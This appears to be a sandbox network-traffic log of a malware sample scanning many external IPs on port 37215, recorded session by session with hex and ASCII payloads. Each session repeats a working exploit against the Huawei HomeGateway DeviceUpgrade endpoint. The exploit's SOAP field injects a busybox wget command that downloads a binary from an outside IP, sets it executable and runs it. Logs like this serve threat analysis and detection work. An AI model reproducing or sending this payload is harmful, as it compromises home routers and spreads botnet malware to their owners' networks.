                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              387192.168.2.1536800138.61.32.19537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718447924 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              388192.168.2.154589094.189.204.637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718463898 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              389192.168.2.1560730222.88.126.24437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718501091 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              390192.168.2.1558050222.104.233.2837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718508959 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              391192.168.2.153993437.76.22.23937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718527079 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              392192.168.2.1557008138.99.18.20637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718560934 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              393192.168.2.1552364190.160.98.5337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718560934 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              394192.168.2.155402894.202.118.2637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718574047 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              395192.168.2.153867241.7.219.537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718588114 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              396192.168.2.1547506157.140.225.837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718620062 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
